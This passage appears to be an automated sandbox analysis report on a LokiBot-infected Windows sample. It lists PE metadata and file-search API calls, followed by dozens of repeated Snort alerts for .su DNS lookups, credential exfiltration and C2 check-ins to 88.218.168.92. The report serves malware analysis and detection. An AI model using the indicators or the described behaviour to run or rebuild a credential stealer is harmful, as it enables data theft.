                Source: dhGoVvfmul.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: dhGoVvfmul.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wntdll.pdbUGP source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040290B FindFirstFileW,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking

                barindex
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:54800 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64454 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64277 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49761
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56076 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49762
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60758 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49764
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60647 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49765
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64909 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49767
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56509 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49769
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:54069 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49771
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57594 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49777
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60512 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49778
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61361 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49779
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50445 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49780
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:51679 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49781
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:52472 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49782
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:62354 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49783
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50061 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49784
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60612 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49785
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:58816 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49786
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56437 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49787
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64825 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49788
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:53989 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49789
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:63431 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49790
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56901 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49791
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50800 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49792
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:52256 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49793
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61081 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49794
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:63712 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49797
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50778 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49798
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61486 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49799
